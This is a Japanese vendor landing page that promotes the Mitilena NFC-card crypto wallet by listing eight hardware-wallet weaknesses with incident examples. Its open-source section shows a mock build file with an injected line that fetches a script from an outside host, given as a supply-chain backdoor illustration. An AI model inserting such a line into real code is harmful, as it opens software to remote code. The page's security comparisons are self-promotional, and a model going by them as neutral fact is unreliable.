8つの欠陥 オープンソース チェックリスト FAQ
Mitilena Mitilena Wallet コールド暗号通貨ウォレット
ONLINE · 22,000+ COINS ウォレットを作成作成
ハードウェアウォレット · 目に見えない欠陥

レビューでは見えない、ハードウェアウォレットの欠陥

穴を塞ぐために端末を買う。すると新しい穴が一緒に来る:ファームウェア、更新、パソコン上のサービス、画面、箱、メーカーアカウント。レビューがメリットと並べる8つの細部——そして2020〜2026年にそれら経由で資金が奪われた8通りの手口。

日付と金額付きの実例 メーカー資料に基づく 同じリストで自社キットも採点
失敗の代償公開事例
2026Coldcard · ファームウェアの弱い乱数$100M+
2025Bybit · 署名者が見えない内容に署名$1.5B
2024Dark Skippy · 2回の署名でシード漏洩研究
2023Ledger Connect Kit · ライブラリのバックドア$600K
2021App Storeの偽ウォレットアプリ17,1 BTC
2020Ledger顧客DB漏洩 · 何年も続くフィッシング27万人
8つの欠陥

レビューが褒める細部の一つひとつが、別々の穴になる

ハードウェアウォレットは一つの穴を塞ぐ:鍵がもうインターネット付きのスマホに乗らない。だが端末は空っぽではない。ファームウェア、更新、デスクトップアプリ、画面、箱、住所を知る販売者——細部ごとに、以前はなかった攻撃面が増える。以下はその8つ:レビューの言い方、それで資金が奪われた経緯、穴の塞ぎ方、そして自社キットにその細部があるか。

欠陥 01

あなたの鍵を作るファームウェア

レビューでは: 「セキュアチップ——鍵は端末内部で作られ、外に出ない」

鍵は巨大な乱数で、それを作るのはファームウェアだ。そこにバグが一つ——鍵の空間は思ったよりずっと狭くなり、端末に触れずとも、購入から何年後でも全所有者まとめて総当たりされる。チップは関係ない。穴はその上にある。

事例
$100M+
Coldcard、2026年7月:2021年から続くファームウェアのビルドバグが、ハードウェアRNGを端末シリアルとタイマー由来の弱い乱数に静かに置き換えていた。鍵強度はおよそ40ビットまで落ち、5,000以上のアドレスが抜かれた。
穴の塞ぎ方
自分の乱数を持ち込めるか:サイコロ、自分のフレーズ。あなたからのエントロピーを受け入れるウォレットは、一つのファームバグに依存しない。
この細部はない
カードにファームウェアはない——暗号化されたキャリアだ。Mitilena Airは端末のシステムRNGから鍵を作り、乱数の単語の代わりに自分のシードフレーズも設定できる。
欠陥 02

強制される更新

レビューでは: 「メーカーが定期的にセキュリティ更新を出す」

更新のたび、ファームウェアが差し替えられる瞬間がある。改ざんされたファームは、外見は普通のまま、2〜3回の通常署名にシード断片を隠す。更新を飛ばすのも選択肢にならない:穴を塞ぐのも同じ更新だからだ。

事例
2 signatures
Dark Skippy、2024年8月:悪意あるハードウェアウォレットのファームウェアが、2回のトランザクションだけでシード全体を外に出せることを研究者が示した。間違った場所からの更新が一度あれば足りる。
穴の塞ぎ方
ファームがどこから来るか、端末が署名を検証するか。何より良いのは、更新するものが何もないことだ。
この細部はない
カード上に更新も差し替えもするものはない。署名はスマホアプリで行われ、ビルドは署名され、App StoreとGoogle Playから来る——自分で見て閉じる普通のアプリと同じだ。
欠陥 03 · 不条理を感じる
レビューでは: ���便利なメーカー製デスクトップアプリ」

不信のためのウォレットに、バックグラウンドサービスが付いてくる

端末を買う理由は一つ:パソコンを信じないため。それが動くには、同じパソコンにバックグラウンドサービスを入れる必要がある。あなたは書いていない、起動していない、制御もしていない:OSと一緒に立ち上がり、マシン上のどのプログラムからも届くポートを待ち、いま何かしている——何を、あなたは知らず、検証することもない。

ウォレットを閉じたあとも、バックグラウンドで動き続けた。何年も。大手メーカーの一つでは別立ての「ブリッジ」サービスだった。2025年にアプリ本体へ隠した——サービスはまだあり、窓と一緒に死ぬだけだ。他の多くでは、デスクトッププログラムなしでは端末はキーホルダーにすぎない。Linuxではudevルールを足さないと、システムがUSBを渡さない。

つまり、パソコンのプログラムに依存しないために買ったものが、パソコンのプログラムなしでは動かない。しかも見える方ではなく、その下で動く方だ。

この細部はない
パソコンには何も入れない:サービスもドライバもポートもない。仲介はすでにスマホにあるNFCチップで、端末メーカー製、OSの管理下。アプリが開いていて、あなた自身がカードをかざしたときだけ動き、スマホは毎回許可を求める。カードは受動的:電池なし、無線なし、勝手には何もしない。アプリを閉じれば、あなたなしで動くものは残らない。正直に言う:スマホアプリはまだ必要で、他と同じ——見て、起動して、自分で閉じる。物置に住み着く住人はいない。
システムモニタWALLET CLOSED
プロセス状態稼働時間
HW Wallet Appwallet
あなたが閉じた-
hwwalletdバックグラウンドサービス · USBブリッジ
実行中412d 06:14
ログイン時にシステムが起動閉じられない——サービスだから
モックアップ。名称は例示。2025年以前、人気USBウォレットの一つが載ったパソコンはこう見えた。「ブリッジ」はその後アプリ本体に組み込まれた——同じサービスだが、一覧にはもう出ない。
たとえ話
プライバシーのための家——そして物置の住人

プライバシーの��めの家が欲しかった。買った。次に警備が必要——入れた。警備プランが動くには、制服の人物を家に入れろと言われた。物置に昼夜住み、すべての鍵を持ち、誰かへ報告する。雇っていない、解雇もできない、夜に何をしているかもわからない。

もちろん「味方」だ。契約書にそう書いてある。プライバシーが欲しくて手に入ったのは代用品:選んでもいない住人がいる家だ。

欠陥 04 · オープンソースは監査ではない
レビューでは: 「オープンソース——誰でも検証できる」

オープンソースはプログラマーが一緒に働くやり方であって、プログラムが盗まないという勲章ではない

オープンソースは、人々がプログラムを共有し一緒に直すために生まれた。共同作業の道具としては優れている。「このソフトは金を盗まない」という品質印ではもともとなく、理由はこうだ:あなたはソースを使っていない。ダウンロードしたものを使っている。

GitHubリポジトリとスマホ上のファイルのあいだには、ビルド、アプリストア、更新、サーバーがある。どの段でも一行が入り、どこからでも何かを引っ張れる——そしてそれはリポジトリにはない。手元のコピーとソースを比べることはできない:ストアはコンパイル済みを配り、ウェブウォレットは今日サーバーが選んだコードを受け取り、拡張機能は夜に静かに更新される。

「オープン」とは、誰かがいつかある版を調べられる、という意味だ。いま手元のコピーが何をしているか——それとは別の話だ。

リポジトリ内 · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
スマホ上 · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
ビルドに入った一行。リポジトリにはなく、ストアでは見えず、端末で動いている。
オープンさは、これらの事例をどれも止めなかった
Ledger Connect Kit2023
GitHub上のオープンなライブラリ;悪意ある版がnpmに公開され、数時間で何十ものサイトが本番で読み込んだ
Copay / event-stream2018
オープンなウォレット;バックドアは、それを狙った依存関係から入った
xz utils2024
20年オープン;あるエンジニアがSSHログインが0.5秒遅いと気づくまで、リリースにバックドアが座っていた
Coldcard2026
オープンソースのファーム;5年続いたビルドバグがハードウェアRNGを弱い��のに差し替え——端末なしで鍵が総当たりされ、5,000以上のアドレス、$1億超
本当に効くもの
他人のコードを読むことではない——誰でもできる二つの確認。第一に振る舞い監査:パソコンに傍受プロキシを置き、アプリを通し、どこへ何を送るかを見る。コードは読まなくてよい——通信がすべて見える。第二に、盗むものがコードにない設計:鍵がネット接続端末に乗らなければ、どんな更新の一行も無力——送るものがない。
私たちのこだわり
第一は自分たちで提供する:アプリをプロキシ経由で、ウェブ版はブラウザのDevToolsで、すべてのリクエストを見る。署名鍵とシードは出ない;唯一の注意はMoneroのview key——「送金はどう出ていくか」のページで説明。第二はキットにある:鍵はインターネットのない端末上のMitilena Airで生まれ、カードに住み、オンラインアプリに届くのは署名だけ——そこをプロキシしても盗むものはない。ここでのオフラインは本物:エアギャップでは鍵デバイスは何にも繋がらない——ケーブルもBluetoothもない;トランザクションは目で見えるQRで出入りする。オンラインのパソコンにぶら下がったケーブル上の「コールド」ウォレットで、独自サービスが何をやり取りしているかもわからない——それではない。
欠陥 05

何に署名しているか見えない画面

レビューでは: 「端末画面で確認——パソコンのウイルスは無力」

画面は小さく、しばしばアドレスと金額ではなくハッシュや「コントラクト呼び出し」を出す。見えないものに確認を押す——署名はそれでも本物で、あなたのものだ。画面は、ないコントロール感だけをくれる。

事例
$1.5B
Bybit、2025年2月:ハードウェアウォレットを持つ署名者が、UIでは普通に見えた送金を確認した。端末が表示したデータは、人が検証できるものではなかった。
穴の塞ぎ方
受取人、金額、操作種別を人の言葉で——ハッシュではなく——そしてワンボタンの拒否。
私たちのこだわり
画面はあるが、それはスマホの画面:アドレス、金額、要求種別を言葉で——送金、コントラクト呼び出し、承認——そして拒否ボタン。大きな金額には——トランザクション全体を受け取る、別のオフライン端末。
欠陥 06

すでにシードが入っている箱

レビューでは: 「セキュリティシール付きの密封箱で届く」

物理端末は配送、仲介、「割引」マーケットプレイスを意味する。ウォレットがプリセットで届き、中の紙切れにシードがある。あるいはストアのそっくりアプリが「有効化のためシードを入力」と求める。

事例
17,1 BTC
App Store、2021年:ハードウェアウォレット所有者がそっくりアプリにシードを入れ、17.1 BTCを失った。同年、DB漏洩のあと、Ledger顧客に偽端末が郵送され、「シードを新しい端末へ移せ」という手紙が付いていた。
穴の塞ぎ方
自分で初期化し、すでに書かれた状態で届いたシードは絶対に使わない。シールは検証ではない;検証とは、あなたが鍵を作ることだ。
私たちのこだわり
カードは空白で届く:鍵を作り、自分で書き込む——箱に出来合いのシードはあり得ない。アプリはサイトのリンク経由でApp StoreとGoogle Playからのみ;シードを求めるのはインポートと署名のときだけだ。
欠陥 07

メーカーのアカウント

レビューでは: 「公式保証、サポート、個人アカウント」

端末を買うために、メーカーに名前、メール、配送先を渡す。あなたの安全は彼らのデータベース次第になる。漏洩すれば——何年も「新しい端末でシードを確認せよ」というメッセージが来て、時には荷物も付く。

事例
27万人
Ledger、2020年:27万人の購入者データが漏洩し、郵便住所も含む。「シードを移行せよ」というメール、電話、荷物は今も続く。
穴の塞ぎ方
あなたについて知るほどベクトルは短くなる:アカウントなしで買い、シードを決して求めないサポート、そして「シードを聞くのは泥棒だけ」というルール。
この細部はない
ウォレットは登録なしで動く——アカウント不要。販売者が知るのは配送先だけ。サポートもアプリもシードを求めない。
欠陥 08

一台と一枚の紙切れ

レビューでは: 「頑丈な筐体、大きな画面、一週間持つバッテリー」

部品が多いほど壊れる:コネクタ、画面、バッテリー。復旧は一枚のシード紙に掛かる——濡れる、引越しで消える、「念のため」写真に撮る。損失の最頻原因はハックではない。

事例
≈20 % BTC
Chainalysisの推計では、ビットコイン全体の約5分の1が永遠に失われている——多くは鍵の紛失であり、ハックではない。
穴の塞ぎ方
箱に鍵のコピーが何枚・どの形で入るか、端末を失ったらどうなるか、壊れるものがあるか。
この細部はない
画面もバッテリーもコネクタもない——壊れるものがない。しかも一枚ではない:箱に5枚のミラーコピー——NFCカード2枚と、防水プラスチックのステルスステッカー3枚、保存寿命10年以上。
チェックリスト

ウォレットにあってはならないもの

8つの欠陥に対応する8つの細部。リストはどのウォレットにも当てはまる——ハードウェア、モバイル、ブラウザ。選ぼうとしているものに何があるか——自社のものも含め——チェックする。

01
ソ��トウェアだけが作る鍵自分の乱数なし——自分のフレーズやサイコロなし
02
鍵が住む場所での更新更新のたびコード差し替えの機会
03
パソコン上のサービス、ドライバ、ポート欠陥03を参照
04
設計の代わりの「オープンソース」バッジ鍵が、他人のコードが届く場所にある
05
アドレスと金額の代わりにハッシュを出す画面拒否ボタンもない
06
すでに書かれた状態で届いたシード箱の中、手紙の中、「有効化アプリ」の中
07
メーカーのアカウントシードを求めるかもしれないサポート
08
一枚のコピーと壊れる部品画面、バッテリー、コネクタ、一枚の紙
このリスト上、Ultimateキットには8つの細部は一つもない。箱の中:NFCカード2枚とステルスステッカー3枚、Mitilena Air(インターネットなしの鍵生成)とMitilena Keys(インターネットなしの署名)。カードは空で届く:鍵を作り暗号化するのはあなた——工場チップではない。中身と価格 →
Ultimate · オフラインキット

工場の「セキュアチップ」ではない——あなたが暗号化するキャリア

カードは空で届く。インターネットのないスマホ上のMitilena Airで鍵を作り、自分で書き込む。署名はMitilena Keys経由で、こちらもオフライン:トランザクションはQRで動く。箱に同一コピーが5つ:NFCカード2枚と防水プラスチックのステルスステッカー3枚。18ネットワーク、USDTを含む20,000種以上のコイン。

パソコンに何もインストールしない
ファームウェアも更新も画面もバッテリーもない
オフラインのスマホへトランザクション——音またはQR、ケーブルもUSBもなし
無料のMitilenaスマホアプリと連携
防水プラスチック、保存寿命10年以上
世界配送 · mitilena-store.com
Mitilena NFCカード
Ultimate · オフライン生成と署名
€369€439
NFCカード2枚 · ステルスステッカー3枚 · Mitilena Air · Mitilena Keysライセンス
Ultimateを購入 · €369 BasicとPremium — 全プランを見る
FAQ

ここまで読んだ人が聞くこと

ハードウェアウォレットのメリットとデメリット——短く言うと?

大きなメリットは一つ:鍵がインターネット付きのスマホにないこと。デメリットは上の8つの細部——それぞれが攻撃面を増やす。良いハードウェアウォレットは、細部が多い方ではなく少ない方だ。

スマホが侵害されたら?

メインのスマホでカードを使う場合、鍵は署名の一瞬だけ隔離環境に現れる——どのスマホウォレットとも同じリスクだが、短い。怖い金額なら——第二層:トランザクションがQRで届く、別のオフライン端末で署名する。

カードが盗まれたり紛失したら?

パスワードがなければカードもステッカーも無用のプラスチック——上の鍵は暗号化されている。失ったコピーは残りの4枚で足りる:箱のカード2枚とステッカー3枚はミラーだ。

ハードウェアウォレットのファームウェアは更新が必要?

メーカーが穴を塞いだなら——はい、そしてまさにそのときファームが差し替えられ得る:出所と署名を確認する。ファームのないキャリアにその選択はない——更新するものも、差し替えるものもない。

USBウォレットと何が違う?

仲介が少ない:ケーブルもドライバもバックグラウンドサービスもデスクトッププログラムもない。仲介は一つ——スマホのNFCチップ——それはウォレットメーカーではなく、あなたとOSに従う。

オープンソースなら安全?

誰かがいつか調べられる、という意味だ。使うのはコードではなくダウンロードしたもので、両者を比べられない。安全は、鍵が他人のコードの届かない場所にある設計から来る。

オフライン生成・署名のNFCカード

Ultimateを購入 · €369 無料ウォレットを作成